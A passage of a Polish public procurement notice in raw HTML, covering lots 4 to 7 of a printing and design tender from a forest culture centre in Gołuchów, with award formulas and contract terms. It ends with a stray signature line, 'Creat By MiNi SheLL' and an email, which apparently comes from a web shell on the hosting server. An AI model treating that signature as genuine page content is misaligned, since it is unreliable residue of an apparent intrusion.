materiałów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Usługa opracowania graficznego, przygotowania do druku, druku, oprawy i dostawy katalogu poplenerowego „Inspiracje leśne VI” - przygotowanie projektu graficznego okładki i wnętrza katalogu i przedstawienie do akceptacji Zamawiającemu - skład i łamanie, przygotowanie plików drukarskich - przeprowadzenie korekty technicznej po składzie (teksty w języku polskim i niemieckim) - format 20 cm x 20 cm - liczba stron: 40 + okładka (4 strony) - papier środek: kreda półmat 180 g, - okładka: kreda półmat 250 g, - druk: 4 + 4 - lakier punktowy na okładce - oprawa: klejona (klej PUR), broszurowa, 4 + 4 - dostawa wydrukowanych książek do siedziby Zamawiającego - nakład: 200 egz. - publikacja z numerem ISBN </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79800000-2 - Usługi drukowania i powiązane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79823000-9 - Usługi drukowania i dostawy</p> <p class="mb-0">79822500-7 - Usługi projektów graficznych</p> <p class="mb-0">79822000-2 - Usługi składu</p> <p class="mb-0">79821100-6 - Usługi korektorskie</p> <p class="mb-0">22100000-1 - Drukowane książki, broszury i ulotki</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty, Zamawiający będzie się kierował następującymi kryteriami i ich wagami:<br/>1) C – Cena – 60%.<br/>Ocena ofert w przedmiotowym kryterium zostanie dokonana wg wzoru:<br/>C= (Cmin/Cx)*60 pkt<br/>gdzie:<br/>C- liczba punktów jakie otrzyma oferta &#34;x&#34;<br/>Cmin - najniższa cena spośród wszystkich ważnych i nieodrzuconych ofert<br/>Cx- cena oferty badanej &#34;x&#34;<br/><br/>Najdłuższy możliwy termin wykonania wymagany przez Zamawiającego od dnia dostarczenia przez Zamawiającego wszystkich niezbędnych materiałów (warunek konieczny) - 14 dni,<br/>- za zaproponowanie terminu realizacji 14 dni – 0 pkt,<br/>- za zaproponowanie terminu realizacji 13-12 dni – 10 pkt,<br/>- za zaproponowanie terminu realizacji 11-10 dni – 20 pkt,<br/>- za zaproponowanie terminu realizacji 9-8 dni – 30 pkt,<br/>- za zaproponowanie terminu realizacji 7dni i mniej – 40 pkt<br/><br/>Termin realizacji należy podawać w pełnych dniach od dnia dostarczenia przez Zamawiającego wszystkich niezbędnych materiałów.<br/>Ocena zostanie dokonana na podstawie wskazanych przez Wykonawcę w ofercie terminów realizacji zamówienia.<br/><br/>Za najkorzystniejszą zostanie uznana oferta z największą ilością punktów, stanowiących sumę punktów przyznanych w każdym kryterium obliczonych wg wzoru:<br/>gdzie:<br/>P = C+T<br/>14<br/>C - liczba punktów przyznana ofercie ocenianej w kryterium „Cena&#34;,<br/>T - łączna liczba punktów przyznana w kryterium „Termin realizacji zamówienia&#34;. P - łączna liczba punktów przyznana ofercie ocenianej w obydwu kryteriach.<br/><br/>Punkty są zaokrąglane do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Najdłuższy możliwy termin wykonania wymagany przez Zamawiającego od dnia dostarczenia przez Zamawiającego wszystkich niezbędnych materiałów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Usługa przygotowania do druku, druku, oprawy i dostawy katalogu „Piły łańcuchowe w zbiorach Ośrodka Kultury Leśnej w Gołuchowie” - skład i łamanie wg projektu OKL, przygotowanie plików drukarskich - obróbka graficzna zdjęć (przycięcie zdjęć wg projektu OKL) - naświetlanie CTP - przygotowanie wersji ostatecznej i kompletnej w formacie PDF dla Zamawiającego - format B5 (poziomo) - objętość: 142 strony formatu B5, w tym 66 stron ze zdjęciami, reszta stron opisy w kolorze czarnym - druk: 4 + 4 - papier środek: kreda 150 g/m2 matowy - okładka: miękka, 4+0, karton 250 g/m2, folia mat., lakier punktowy - szyte nićmi - dostawa wydrukowanych książek do siedziby Zamawiającego - nakład: 300 egz. - publikacja z numerem ISBN </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79800000-2 - Usługi drukowania i powiązane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79823000-9 - Usługi drukowania i dostawy</p> <p class="mb-0">79822500-7 - Usługi projektów graficznych</p> <p class="mb-0">79822000-2 - Usługi składu</p> <p class="mb-0">79821100-6 - Usługi korektorskie</p> <p class="mb-0">22100000-1 - Drukowane książki, broszury i ulotki</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty, Zamawiający będzie się kierował następującymi kryteriami i ich wagami:<br/>1) C – Cena – 60%.<br/>Ocena ofert w przedmiotowym kryterium zostanie dokonana wg wzoru:<br/>C= (Cmin/Cx)*60 pkt<br/>gdzie:<br/>C- liczba punktów jakie otrzyma oferta &#34;x&#34;<br/>Cmin - najniższa cena spośród wszystkich ważnych i nieodrzuconych ofert<br/>Cx- cena oferty badanej &#34;x&#34;<br/><br/>Najdłuższy możliwy termin wykonania wymagany przez Zamawiającego od dnia dostarczenia przez Zamawiającego wszystkich niezbędnych materiałów (warunek konieczny) - 30 dni,<br/>- za zaproponowanie terminu realizacji 30 dni – 0 pkt,<br/>- za zaproponowanie terminu realizacji 25-29 dni – 10 pkt,<br/>- za zaproponowanie terminu realizacji 20-24 dni – 20 pkt,<br/>- za zaproponowanie terminu realizacji 15-19 dni – 30 pkt,<br/>- za zaproponowanie terminu realizacji 14 dni i mniej – 40 pkt<br/><br/>Termin realizacji należy podawać w pełnych dniach od dnia dostarczenia przez Zamawiającego wszystkich niezbędnych materiałów.<br/>Ocena zostanie dokonana na podstawie wskazanych przez Wykonawcę w ofercie terminów realizacji zamówienia.<br/><br/>Za najkorzystniejszą zostanie uznana oferta z największą ilością punktów, stanowiących sumę punktów przyznanych w każdym kryterium obliczonych wg wzoru:<br/>gdzie:<br/>P = C+T<br/>14<br/>C - liczba punktów przyznana ofercie ocenianej w kryterium „Cena&#34;,<br/>T - łączna liczba punktów przyznana w kryterium „Termin realizacji zamówienia&#34;. P - łączna liczba punktów przyznana ofercie ocenianej w obydwu kryteriach.<br/><br/>Punkty są zaokrąglane do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Najdłuższy możliwy termin wykonania wymagany przez Zamawiającego od dnia dostarczenia przez Zamawiającego wszystkich niezbędnych materiałów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Usługa druku i dostawy folderów informacyjnych<br/>- 4 rodzaje<br/>- korekta przed i po składzie<br/>- format: A4, składany na trzy części<br/>- papier kreda półmat 150 g<br/>- druk: 4 + 4<br/>- bigowanie i składanie<br/>- plik z projektem przygotowany przez Zleceniodawcę w Corelu i PDF<br/>- dostawa wydrukowanych folderów do siedziby Zamawiającego<br/>- nakład: po 1500 szt. z każdego rodzaju (łącznie: 6000 szt.) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79800000-2 - Usługi drukowania i powiązane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79823000-9 - Usługi drukowania i dostawy</p> <p class="mb-0">79822500-7 - Usługi projektów graficznych</p> <p class="mb-0">79822000-2 - Usługi składu</p> <p class="mb-0">79821100-6 - Usługi korektorskie</p> <p class="mb-0">22100000-1 - Drukowane książki, broszury i ulotki</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty, Zamawiający będzie się kierował następującymi kryteriami i ich wagami:<br/>1) C – Cena – 60%.<br/>Ocena ofert w przedmiotowym kryterium zostanie dokonana wg wzoru:<br/>C= (Cmin/Cx)*60 pkt<br/>gdzie:<br/>C- liczba punktów jakie otrzyma oferta &#34;x&#34;<br/>Cmin - najniższa cena spośród wszystkich ważnych i nieodrzuconych ofert<br/>Cx- cena oferty badanej &#34;x&#34;<br/><br/>Najdłuższy możliwy termin wykonania wymagany przez Zamawiającego od dnia dostarczenia przez Zamawiającego wszystkich niezbędnych materiałów (warunek konieczny) - 30 dni,<br/>- za zaproponowanie terminu realizacji 30 dni – 0 pkt,<br/>- za zaproponowanie terminu realizacji 25-29 dni – 10 pkt,<br/>- za zaproponowanie terminu realizacji 20-24 dni – 20 pkt,<br/>- za zaproponowanie terminu realizacji 15-19 dni – 30 pkt,<br/>- za zaproponowanie terminu realizacji 14 dni i mniej – 40 pkt<br/><br/>Termin realizacji należy podawać w pełnych dniach od dnia dostarczenia przez Zamawiającego wszystkich niezbędnych materiałów.<br/>Ocena zostanie dokonana na podstawie wskazanych przez Wykonawcę w ofercie terminów realizacji zamówienia.<br/><br/>Za najkorzystniejszą zostanie uznana oferta z największą ilością punktów, stanowiących sumę punktów przyznanych w każdym kryterium obliczonych wg wzoru:<br/>gdzie:<br/>P = C+T<br/>14<br/>C - liczba punktów przyznana ofercie ocenianej w kryterium „Cena&#34;,<br/>T - łączna liczba punktów przyznana w kryterium „Termin realizacji zamówienia&#34;. P - łączna liczba punktów przyznana ofercie ocenianej w obydwu kryteriach.<br/><br/>Punkty są zaokrąglane do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Najdłuższy możliwy termin wykonania wymagany przez Zamawiającego od dnia dostarczenia przez Zamawiającego wszystkich niezbędnych materiałów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przygotowanie i dostawa puzzli – gry edukacyjnej<br/>- puzzle przedstawiające stado żubrów z opisem gatunku;<br/>- 160 elementów;<br/>- puzzle: rozmiar po złożeniu: 470 x 210 mm (poziom), tektura o grubości 1,5 mm plus<br/>oklejka 130-150g/m2, papier kredowany, druk 4/0 CMYK, 1/0 lakier dyspersyjny (gloss),<br/>sztancowanie;<br/>- puzzle umieszczone w pudełku;<br/>- format pudełka: 270 mm x 255 mm x 65 mm, dwuelementowe, wykonane z mikrofali<br/>(fali E) z oklejką na papierze: 115-130 g/m2 papier kredowany, druk 4/0 CMYK, plus folia<br/>błyszcząca (gloss), kaszerowanie, sztancowanie;<br/>- opracowanie graficzne, wykonanie projektu na podstawie materiałów ilustracyjnych i<br/>tekstowych otrzymanych od Zamawiającego i przedłożenie go do akceptacji<br/>Zamawiającego;<br/>- przygotowanie plików pdf produktu<br/>- dostawa do siedziby Zamawiającego;<br/>- nakład: 500 egz. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79800000-2 - Usługi drukowania i powiązane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79823000-9 - Usługi drukowania i dostawy</p> <p class="mb-0">79822500-7 - Usługi projektów graficznych</p> <p class="mb-0">79822000-2 - Usługi składu</p> <p class="mb-0">79821100-6 - Usługi korektorskie</p> <p class="mb-0">22100000-1 - Drukowane książki, broszury i ulotki</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-11-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty, Zamawiający będzie się kierował następującymi kryteriami i ich wagami:<br/>1) C – Cena – 60%.<br/>Ocena ofert w przedmiotowym kryterium zostanie dokonana wg wzoru:<br/>C= (Cmin/Cx)*60 pkt<br/>gdzie:<br/>C- liczba punktów jakie otrzyma oferta &#34;x&#34;<br/>Cmin - najniższa cena spośród wszystkich ważnych i nieodrzuconych ofert<br/>Cx- cena oferty badanej &#34;x&#34;<br/><br/>Najdłuższy możliwy termin wykonania wymagany przez Zamawiającego od dnia dostarczenia przez Zamawiającego wszystkich niezbędnych materiałów (warunek konieczny) - 14 dni,<br/>- za zaproponowanie terminu realizacji 14 dni – 0 pkt,<br/>- za zaproponowanie terminu realizacji 13-12 dni – 10 pkt,<br/>- za zaproponowanie terminu realizacji 11-10 dni – 20 pkt,<br/>- za zaproponowanie terminu realizacji 9-8 dni – 30 pkt,<br/>- za zaproponowanie terminu realizacji 7dni i mniej – 40 pkt<br/><br/>Termin realizacji należy podawać w pełnych dniach od dnia dostarczenia przez Zamawiającego wszystkich niezbędnych materiałów.<br/>Ocena zostanie dokonana na podstawie wskazanych przez Wykonawcę w ofercie terminów realizacji zamówienia.<br/><br/>Za najkorzystniejszą zostanie uznana oferta z największą ilością punktów, stanowiących sumę punktów przyznanych w każdym kryterium obliczonych wg wzoru:<br/>gdzie:<br/>P = C+T<br/>14<br/>C - liczba punktów przyznana ofercie ocenianej w kryterium „Cena&#34;,<br/>T - łączna liczba punktów przyznana w kryterium „Termin realizacji zamówienia&#34;. P - łączna liczba punktów przyznana ofercie ocenianej w obydwu kryteriach.<br/><br/>Punkty są zaokrąglane do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Najdłuższy możliwy termin wykonania wymagany przez Zamawiającego od dnia dostarczenia przez Zamawiającego wszystkich niezbędnych materiałów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie, o którym mowa w ust.1<br/>pkt 2) SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza możliwość zmiany Umowy w przypadkach określonych w art. 455 ust. 1 pkt 2 – 4 i ust. 2 ustawy<br/>Pzp oraz przewiduje zgodnie z art. 455 ust. 1 pkt 1) ustawy Pzp możliwość zmiany postanowień Umowy określając<br/>następujący rodzaj i zakres oraz warunki zmiany postanowień Umowy:<br/>Wynagrodzenia w przypadku:<br/>a) zmiany stawki podatku od towarów i usług (VAT), wynagrodzenie należne Wykonawcy zostanie odpowiednio zmienione w<br/>stosunku wynikającym ze zmienionej stawki podatku od towarów i usług (VAT),<br/>b) w przypadku określonym w § 4 ust. 1, wynagrodzenie należne zostanie obniżone o wartość niewykonywanej części<br/>przedmiotu zamówienia, zgodnie z § 2 ust.1,<br/>c) w przypadku zmiany zakresu świadczenia Umowy w związku z zaistnieniem okoliczności, tj. zaistnienia okoliczności<br/>nadzwyczajnych, np. działań wojennych, aktów terroryzmu, rewolucji, przewrotu wojskowego lub cywilnego, wojny domowej,<br/>skażeń radioaktywnych oraz istnieniem/zaistnieniem epidemii/pandemii, klęski żywiołowej, jak huragany, powodzie,<br/>trzęsienie ziemi, bunty, niepokoje, strajki, okupacje budowy spowodowane przez osoby inne niż pracownicy Wykonawcy i<br/>jego podwykonawców,<br/>Terminu realizacji Przedmiotu Umowy:<br/>1) w przypadku niemożności wykonywania przedmiotu Umowy w razie zaistnienia okoliczności nadzwyczajnych, np. działań<br/>wojennych, aktów terroryzmu, rewolucji, przewrotu wojskowego lub cywilnego, wojny domowej, skażeń radioaktywnych,<br/>termin wykonania przedmiotu Umowy przedłużony zostanie o czas trwania okoliczności nadzwyczajnych uniemożliwiających<br/>wykonanie przedmiotu Umowy i - jeśli dotyczy – o czas niezbędny do usunięcia przeszkody uniemożliwiającej wykonanie<br/>przedmiotu Umowy, powstałej w związku z okolicznościami nadzwyczajnymi, o których mowa powyżej,<br/>2) w przypadku niemożności wykonywania przedmiotu Umowy w związku z zaistnieniem/istnieniem epidemii/pandemii,<br/>klęski żywiołowej, jak huragany, powodzie, trzęsienie ziemi, bunty, niepokoje, strajki, okupacje budowy spowodowane przez<br/>osoby inne niż pracownicy Wykonawcy i jego podwykonawców - termin wykonania przedmiotu Umowy przedłużony<br/>zostanie o czas trwania okoliczności uniemożliwiających wykonywanie przedmiotu Umowy, o których mowa powyżej i - jeśli<br/>dotyczy – o czas niezbędny do usunięcia przeszkody uniemożliwiającej wykonanie przedmiotu Umowy w związku z<br/>okolicznościami, o których mowa powyżej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-04 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem platformy zakupowej adres: https://platformazakupowa.pl/pn/lasy_okl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-04 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-11-21</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com